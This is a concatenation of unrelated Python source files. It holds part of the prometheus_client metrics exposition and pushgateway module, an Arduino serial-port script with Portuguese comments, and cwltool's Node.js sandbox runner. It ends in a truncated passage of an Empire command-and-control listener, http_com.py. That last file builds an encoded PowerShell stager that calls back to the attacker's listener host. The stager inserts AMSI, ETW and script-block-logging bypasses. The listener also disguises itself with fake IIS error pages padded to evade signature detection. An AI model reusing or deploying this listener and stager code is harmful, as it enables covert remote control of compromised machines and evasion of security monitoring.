"""Starts a WSGI server for prometheus metrics as a daemon thread."""
app = make_wsgi_app(registry)
httpd = make_server(addr, port, app, ThreadingWSGIServer, handler_class=_SilentHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
start_http_server = start_wsgi_server
def generate_latest(registry=REGISTRY):
"""Returns the metrics from the registry in latest text format as a string."""
def sample_line(line):
if line.labels:
labelstr = '{{{0}}}'.format(','.join(
['{}="{}"'.format(
k, v.replace('\\', r'\\').replace('\n', r'\n').replace('"', r'\"'))
for k, v in sorted(line.labels.items())]))
else:
labelstr = ''
timestamp = ''
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = f' {int(float(line.timestamp) * 1000):d}'
return f'{line.name}{labelstr} {floatToGoString(line.value)}{timestamp}\n'
output = []
for metric in registry.collect():
try:
mname = metric.name
mtype = metric.type
# Munging from OpenMetrics into Prometheus format.
if mtype == 'counter':
mname = mname + '_total'
elif mtype == 'info':
mname = mname + '_info'
mtype = 'gauge'
elif mtype == 'stateset':
mtype = 'gauge'
elif mtype == 'gaugehistogram':
# A gauge histogram is really a gauge,
# but this captures the structure better.
mtype = 'histogram'
elif mtype == 'unknown':
mtype = 'untyped'
output.append('# HELP {} {}\n'.format(
mname, metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {mname} {mtype}\n')
om_samples = {}
for s in metric.samples:
for suffix in ['_created', '_gsum', '_gcount']:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
om_samples.setdefault(suffix, []).append(sample_line(s))
break
else:
output.append(sample_line(s))
except Exception as exception:
exception.args = (exception.args or ('',)) + (metric,)
raise
for suffix, lines in sorted(om_samples.items()):
output.append('# HELP {}{} {}\n'.format(metric.name, suffix,
metric.documentation.replace('\\', r'\\').replace('\n', r'\n')))
output.append(f'# TYPE {metric.name}{suffix} gauge\n')
output.extend(lines)
return ''.join(output).encode('utf-8')
def choose_encoder(accept_header):
accept_header = accept_header or ''
for accepted in accept_header.split(','):
if accepted.split(';')[0].strip() == 'application/openmetrics-text':
return (openmetrics.generate_latest,
openmetrics.CONTENT_TYPE_LATEST)
return generate_latest, CONTENT_TYPE_LATEST
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
# Prepare parameters
registry = self.registry
accept_header = self.headers.get('Accept')
params = parse_qs(urlparse(self.path).query)
# Bake output
status, header, output = _bake_output(registry, accept_header, params)
# Return output
self.send_response(int(status.split(' ')[0]))
self.send_header(*header)
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object),
{"registry": registry})
return MyMetricsHandler
def write_to_textfile(path, registry):
"""Write metrics to the given path.
This is intended for use with the Node exporter textfile collector.
The path must end in .prom for the textfile collector to process it."""
tmppath = f'{path}.{os.getpid()}.{threading.current_thread().ident}'
with open(tmppath, 'wb') as f:
f.write(generate_latest(registry))
# rename(2) is atomic but fails on Windows if the destination file exists
if os.name == 'nt':
os.replace(tmppath, path)
else:
os.rename(tmppath, path)
def _make_handler(url, method, timeout, headers, data, base_handler):
def handle():
request = Request(url, data=data)
request.get_method = lambda: method
for k, v in headers:
request.add_header(k, v)
resp = build_opener(base_handler).open(request, timeout=timeout)
if resp.code >= 400:
raise OSError(f"error talking to pushgateway: {resp.code} {resp.msg}")
return handle
def default_handler(url, method, timeout, headers, data):
"""Default handler that implements HTTP/HTTPS connections.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
return _make_handler(url, method, timeout, headers, data, HTTPHandler)
def passthrough_redirect_handler(url, method, timeout, headers, data):
"""
Handler that automatically trusts redirect responses for all HTTP methods.
Augments standard HTTPRedirectHandler capability by permitting PUT requests,
preserving the method upon redirect, and passing through all headers and
data from the original request. Only use this handler if you control or
trust the source of redirect responses you encounter when making requests
via the Prometheus client. This handler will simply repeat the identical
request, including same method and data, to the new redirect URL."""
return _make_handler(url, method, timeout, headers, data, _PrometheusRedirectHandler)
def basic_auth_handler(url, method, timeout, headers, data, username=None, password=None):
"""Handler that implements HTTP/HTTPS connections with Basic Auth.
Sets auth headers using supplied 'username' and 'password', if set.
Used by the push_to_gateway functions. Can be re-used by other handlers."""
def handle():
"""Handler that implements HTTP Basic Auth.
"""
if username is not None and password is not None:
auth_value = f'{username}:{password}'.encode()
auth_token = base64.b64encode(auth_value)
auth_header = b'Basic ' + auth_token
headers.append(['Authorization', auth_header])
default_handler(url, method, timeout, headers, data)()
return handle
def push_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""Push metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
If not None, the argument must be a function which accepts
the following arguments:
url, method, timeout, headers, and content
May be used to implement additional functionality not
supported by the built-in default handler (such as SSL
client certicates, and HTTP authentication mechanisms).
'url' is the URL for the request, the 'gateway' argument
described earlier will form the basis of this URL.
'method' is the HTTP method which should be used when
carrying out the request.
'timeout' requests not successfully completed after this
many seconds should be aborted. If timeout is None, then
the handler should not set a timeout.
'headers' is a list of ("header-name","header-value") tuples
which must be passed to the pushgateway in the form of HTTP
request headers.
The function should raise an exception (e.g. IOError) on
failure.
'content' is the data which should be used to form the HTTP
Message Body.
This overwrites all metrics with the same job and grouping_key.
This uses the PUT HTTP method."""
_use_gateway('PUT', gateway, job, registry, grouping_key, timeout, handler)
def pushadd_to_gateway(
gateway, job, registry, grouping_key=None, timeout=30,
handler=default_handler):
"""PushAdd metrics to the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`registry` is an instance of CollectorRegistry
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long push will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This replaces metrics with the same name, job and grouping_key.
This uses the POST HTTP method."""
_use_gateway('POST', gateway, job, registry, grouping_key, timeout, handler)
def delete_from_gateway(
gateway, job, grouping_key=None, timeout=30, handler=default_handler):
"""Delete metrics from the given pushgateway.
`gateway` the url for your push gateway. Either of the form
'http://pushgateway.local', or 'pushgateway.local'.
Scheme defaults to 'http' if none is provided
`job` is the job label to be attached to all pushed metrics
`grouping_key` please see the pushgateway documentation for details.
Defaults to None
`timeout` is how long delete will attempt to connect before giving up.
Defaults to 30s, can be set to None for no timeout.
`handler` is an optional function which can be provided to perform
requests to the 'gateway'.
Defaults to None, in which case an http or https request
will be carried out by a default handler.
See the 'prometheus_client.push_to_gateway' documentation
for implementation requirements.
This deletes metrics with the given job and grouping_key.
This uses the DELETE HTTP method."""
_use_gateway('DELETE', gateway, job, None, grouping_key, timeout, handler)
def _use_gateway(method, gateway, job, registry, grouping_key, timeout, handler):
gateway_url = urlparse(gateway)
# See https://bugs.python.org/issue27657 for details on urlparse in py>=3.7.6.
if not gateway_url.scheme or (
PYTHON376_OR_NEWER
and gateway_url.scheme not in ['http', 'https']
):
gateway = f'http://{gateway}'
gateway = gateway.rstrip('/')
url = '{}/metrics/{}/{}'.format(gateway, *_escape_grouping_key("job", job))
data = b''
if method != 'DELETE':
data = generate_latest(registry)
if grouping_key is None:
grouping_key = {}
url += ''.join(
'/{}/{}'.format(*_escape_grouping_key(str(k), str(v)))
for k, v in sorted(grouping_key.items()))
handler(
url=url, method=method, timeout=timeout,
headers=[('Content-Type', CONTENT_TYPE_LATEST)], data=data,
)()
def _escape_grouping_key(k, v):
if v == "":
# Per https://github.com/prometheus/pushgateway/pull/346.
return k + "@base64", "="
elif '/' in v:
# Added in Pushgateway 0.9.0.
return k + "@base64", base64.urlsafe_b64encode(v.encode("utf-8")).decode("utf-8")
else:
return k, quote_plus(v)
def instance_ip_grouping_key():
"""Grouping key with instance set to the IP Address of this host."""
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as s:
if sys.platform == 'darwin':
# This check is done this way only on MacOS devices
# it is done this way because the localhost method does
# not work.
# This method was adapted from this StackOverflow answer:
# https://stackoverflow.com/a/28950776
s.connect(('10.255.255.255', 1))
else:
s.connect(('localhost', 0))
return {'instance': s.getsockname()[0]}
from .asgi import make_asgi_app # noqa
|
arduinoePython.py
|
import serial
import threading
import time
conectado = False
porta = 'COM3' # linux ou mac em geral -> '/dev/ttyS0'
velocidadeBaud = 115200
mensagensRecebidas = 1;
desligarArduinoThread = False
try:
SerialArduino = serial.Serial(porta,velocidadeBaud, timeout = 0.2)
except:
print("Verificar porta serial ou religar arduino")
def handle_data(data):
global mensagensRecebidas
print("Recebi " + str(mensagensRecebidas) + ": " + data)
mensagensRecebidas += 1
def read_from_port(ser):
global conectado, desligarArduinoThread
while not conectado:
conectado = True
while True:
reading = ser.readline().decode()
if reading != "":
handle_data(reading)
if desligarArduinoThread:
print("Desligando Arduino")
break
lerSerialThread = threading.Thread(target=read_from_port, args=(SerialArduino,))
lerSerialThread.start()
print("Preparando Arduino")
time.sleep(2)
print("Arduino Pronto")
while (True):
try:
print("Enviando")
SerialArduino.write('ligar luzes\n'.encode())
time.sleep(2)
except KeyboardInterrupt:
print("Apertou Ctrl+C")
desligarArduinoThread = True
SerialArduino.close()
lerSerialThread.join()
break
|
sandboxjs.py
|
from __future__ import absolute_import
import errno
import json
import logging
import os
import re
import select
import sys
import threading
from io import BytesIO
from typing import Any, Dict, List, Mapping, Text, Tuple, Union
import six
from pkg_resources import resource_stream
from .utils import json_dumps, onWindows, subprocess, processes_to_kill
try:
import queue # type: ignore
except ImportError:
import Queue as queue # type: ignore
class JavascriptException(Exception):
pass
_logger = logging.getLogger("cwltool")
JSON = Union[Dict[Text, Any], List[Any], Text, int, float, bool, None]
localdata = threading.local()
have_node_slim = False
# minimum acceptable version of nodejs engine
minimum_node_version_str = '0.10.26'
def check_js_threshold_version(working_alias):
# type: (str) -> bool
"""Checks if the nodeJS engine version on the system
with the allowed minimum version.
https://github.com/nodejs/node/blob/master/CHANGELOG.md#nodejs-changelog
"""
# parse nodejs version into int Tuple: 'v4.2.6\n' -> [4, 2, 6]
current_version_str = subprocess.check_output(
[working_alias, "-v"]).decode('utf-8')
current_version = [int(v) for v in current_version_str.strip().strip('v').split('.')]
minimum_node_version = [int(v) for v in minimum_node_version_str.split('.')]
if current_version >= minimum_node_version:
return True
else:
return False
def new_js_proc(js_text, force_docker_pull=False):
# type: (Text, bool) -> subprocess.Popen
required_node_version, docker = (False,)*2
nodejs = None
trynodes = ("nodejs", "node")
for n in trynodes:
try:
if subprocess.check_output([n, "--eval", "process.stdout.write('t')"]).decode('utf-8') != "t":
continue
else:
nodejs = subprocess.Popen([n, "--eval", js_text],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
processes_to_kill.append(nodejs)
required_node_version = check_js_threshold_version(n)
break
except (subprocess.CalledProcessError, OSError):
pass
if nodejs is None or nodejs is not None and required_node_version is False:
try:
nodeimg = "node:slim"
global have_node_slim
if not have_node_slim:
dockerimgs = subprocess.check_output(["docker", "images", "-q", nodeimg]).decode('utf-8')
# if output is an empty string
if (len(dockerimgs.split("\n")) <= 1) or force_docker_pull:
# pull node:slim docker container
nodejsimg = subprocess.check_output(["docker", "pull", nodeimg]).decode('utf-8')
_logger.info("Pulled Docker image %s %s", nodeimg, nodejsimg)
have_node_slim = True
nodejs = subprocess.Popen(["docker", "run",
"--attach=STDIN", "--attach=STDOUT", "--attach=STDERR",
"--sig-proxy=true", "--interactive",
"--rm", nodeimg, "node", "--eval", js_text],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
processes_to_kill.append(nodejs)
docker = True
except OSError as e:
if e.errno == errno.ENOENT:
pass
else:
raise
except subprocess.CalledProcessError:
pass
# docker failed and nodejs not on system
if nodejs is None:
raise JavascriptException(
u"cwltool requires Node.js engine to evaluate and validate "
u"Javascript expressions, but couldn't find it. Tried %s, "
u"docker run node:slim" % u", ".join(trynodes))
# docker failed, but nodejs is installed on system but the version is below the required version
if docker is False and required_node_version is False:
raise JavascriptException(
u'cwltool requires minimum v{} version of Node.js engine.'.format(minimum_node_version_str),
u'Try updating: https://docs.npmjs.com/getting-started/installing-node')
return nodejs
def exec_js_process(js_text, # type: Text
timeout=None, # type: float
js_console=False, # type: bool
context=None, # type: Text
force_docker_pull=False, # type: bool
debug=False # type: bool
):
# type: (...) -> Tuple[int, Text, Text]
if not hasattr(localdata, "procs"):
localdata.procs = {}
if js_console and context is not None:
raise NotImplementedError("js_console=True and context not implemented")
if js_console:
js_engine = 'cwlNodeEngineJSConsole.js'
_logger.warn("Running with support for javascript console in expressions (DO NOT USE IN PRODUCTION)")
elif context is not None:
js_engine = "cwlNodeEngineWithContext.js"
else:
js_engine = 'cwlNodeEngine.js'
created_new_process = False
if context is None:
nodejs = localdata.procs.get(js_engine)
else:
nodejs = localdata.procs.get((js_engine, context))
if nodejs is None \
or nodejs.poll() is not None \
or onWindows():
res = resource_stream(__name__, js_engine)
js_engine_code = res.read().decode('utf-8')
created_new_process = True
new_proc = new_js_proc(js_engine_code, force_docker_pull=force_docker_pull)
if context is None:
localdata.procs[js_engine] = new_proc
nodejs = new_proc
else:
localdata.procs[(js_engine, context)] = new_proc
nodejs = new_proc
killed = []
""" Kill the node process if it exceeds timeout limit"""
def terminate():
try:
killed.append(True)
nodejs.kill()
except OSError:
pass
if timeout is None:
timeout = 20
tm = threading.Timer(timeout, terminate)
tm.daemon = True
tm.start()
stdin_text = u""
if created_new_process and context is not None:
stdin_text = json_dumps(context) + "\n"
stdin_text += json_dumps(js_text) + "\n"
stdin_buf = BytesIO(stdin_text.encode('utf-8'))
stdout_buf = BytesIO()
stderr_buf = BytesIO()
rselect = [nodejs.stdout, nodejs.stderr] # type: List[BytesIO]
wselect = [nodejs.stdin] # type: List[BytesIO]
PROCESS_FINISHED_STR = "r1cepzbhUTxtykz5XTC4\n"
def process_finished(): # type: () -> bool
return stdout_buf.getvalue().decode('utf-8').endswith(PROCESS_FINISHED_STR) and \
stderr_buf.getvalue().decode('utf-8').endswith(PROCESS_FINISHED_STR)
# On windows system standard input/output are not handled properly by select module
# (modules like pywin32, msvcrt, gevent don't work either)
if sys.platform=='win32':
READ_BYTES_SIZE = 512
# creating queue for reading from a thread to queue
input_queue = queue.Queue()
output_queue = queue.Queue()
error_queue = queue.Queue()
# To tell threads that output has ended and threads can safely exit
no_more_output = threading.Lock()
no_more_output.acquire()
no_more_error = threading.Lock()
no_more_error.acquire()
# put constructed command to input queue which then will be passed to nodejs's stdin
def put_input(input_queue):
while True:
b = stdin_buf.read(READ_BYTES_SIZE)
if b:
input_queue.put(b)
else:
break
# get the output from nodejs's stdout and continue till otuput ends
def get_output(output_queue):
while not no_more_output.acquire(False):
b=os.read(nodejs.stdout.fileno(), READ_BYTES_SIZE)
if b:
output_queue.put(b)
# get the output from nodejs's stderr and continue till error output ends
def get_error(error_queue):
while not no_more_error.acquire(False):
b = os.read(nodejs.stderr.fileno(), READ_BYTES_SIZE)
if b:
error_queue.put(b)
# Threads managing nodejs.stdin, nodejs.stdout and nodejs.stderr respectively
input_thread = threading.Thread(target=put_input, args=(input_queue,))
input_thread.daemon=True
input_thread.start()
output_thread = threading.Thread(target=get_output, args=(output_queue,))
output_thread.daemon=True
output_thread.start()
error_thread = threading.Thread(target=get_error, args=(error_queue,))
error_thread.daemon=True
error_thread.start()
finished = False
while not finished and tm.is_alive():
try:
if nodejs.stdin in wselect:
if not input_queue.empty():
os.write(nodejs.stdin.fileno(), input_queue.get())
elif not input_thread.is_alive():
wselect = []
if nodejs.stdout in rselect:
if not output_queue.empty():
stdout_buf.write(output_queue.get())
if nodejs.stderr in rselect:
if not error_queue.empty():
stderr_buf.write(error_queue.get())
if process_finished() and error_queue.empty() and output_queue.empty():
finished = True
no_more_output.release()
no_more_error.release()
except OSError as e:
break
else:
while not process_finished() and tm.is_alive():
rready, wready, _ = select.select(rselect, wselect, [])
try:
if nodejs.stdin in wready:
b = stdin_buf.read(select.PIPE_BUF)
if b:
os.write(nodejs.stdin.fileno(), b)
for pipes in ((nodejs.stdout, stdout_buf), (nodejs.stderr, stderr_buf)):
if pipes[0] in rready:
b = os.read(pipes[0].fileno(), select.PIPE_BUF)
if b:
pipes[1].write(b)
except OSError as e:
break
tm.cancel()
stdin_buf.close()
stdoutdata = stdout_buf.getvalue()[:-len(PROCESS_FINISHED_STR) - 1]
stderrdata = stderr_buf.getvalue()[:-len(PROCESS_FINISHED_STR) - 1]
nodejs.poll()
if nodejs.poll() not in (None, 0):
if killed:
returncode = -1
else:
returncode = nodejs.returncode
else:
returncode = 0
# On windows currently a new instance of nodejs process is used due to problem with blocking on read operation on windows
if onWindows():
nodejs.kill()
return returncode, stdoutdata.decode('utf-8'), stderrdata.decode('utf-8')
def code_fragment_to_js(js, jslib=""):
# type: (Text, Text) -> Text
if isinstance(js, six.string_types) and len(js) > 1 and js[0] == '{':
inner_js = js
else:
inner_js = "{return (%s);}" % js
return u"\"use strict\";\n%s\n(function()%s)()" % (jslib, inner_js)
def execjs(js, # type: Text
jslib, # type: Text
timeout=None, # type: float
force_docker_pull=False, # type: bool
debug=False, # type: bool
js_console=False # type: bool
): # type: (...) -> JSON
fn = code_fragment_to_js(js, jslib)
returncode, stdout, stderr = exec_js_process(
fn, timeout=timeout, js_console=js_console, force_docker_pull=force_docker_pull, debug=debug)
if js_console:
if len(stderr) > 0:
_logger.info("Javascript console output:")
_logger.info("----------------------------------------")
_logger.info('\n'.join(re.findall(r'^[[](?:log|err)[]].*$', stderr, flags=re.MULTILINE)))
_logger.info("----------------------------------------")
def stdfmt(data): # type: (Text) -> Text
if "\n" in data:
return "\n" + data.strip()
return data
def fn_linenum(): # type: () -> Text
lines = fn.splitlines()
ofs = 0
maxlines = 99
if len(lines) > maxlines:
ofs = len(lines) - maxlines
lines = lines[-maxlines:]
return u"\n".join(u"%02i %s" % (i + ofs + 1, b) for i, b in enumerate(lines))
if returncode != 0:
if debug:
info = u"returncode was: %s\nscript was:\n%s\nstdout was: %s\nstderr was: %s\n" %\
(returncode, fn_linenum(), stdfmt(stdout), stdfmt(stderr))
else:
info = u"Javascript expression was: %s\nstdout was: %s\nstderr was: %s" %\
(js, stdfmt(stdout), stdfmt(stderr))
if returncode == -1:
raise JavascriptException(u"Long-running script killed after %s seconds: %s" % (timeout, info))
else:
raise JavascriptException(info)
try:
return json.loads(stdout)
except ValueError as e:
raise JavascriptException(u"%s\nscript was:\n%s\nstdout was: '%s'\nstderr was: '%s'\n" %
(e, fn_linenum(), stdout, stderr))
|
http_com.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import packets
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S] COM',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell only) that uses a GET/POST approach '
'using a hidden Internet Explorer COM object. If using HTTPS, valid certificate required.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http_com'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'RequestHeader': {
'Description': 'Cannot use Cookie header, choose a different HTTP request header for comms.',
'Required': True,
'Value': 'CF-RAY'
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'SlackToken': {
'Description': 'Your SlackBot API token to communicate with your Slack instance.',
'Required': False,
'Value': ''
},
'SlackChannel': {
'Description': 'The Slack channel or DM that notifications will be sent to.',
'Required': False,
'Value': '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# used to protect self.http and self.mainMenu.conn during threaded listener access
self.lock = threading.Lock()
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
# this might not be necessary. Could probably be achieved by just callingg mainmenu.get_db but all the other files have
# implemented it in place. Might be worthwhile to just make a database handling file
def get_db_connection(self):
"""
Returns the cursor for SQLlite DB
"""
self.lock.acquire()
self.mainMenu.conn.row_factory = None
self.lock.release()
return self.mainMenu.conn
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http_com generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
requestHeader = listenerOptions['RequestHeader']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("K") + "=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$' + helpers.generate_random_script_var_name(
"K") + '=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$' + helpers.generate_random_script_var_name(
"K") + '[$_%$' + helpers.generate_random_script_var_name(
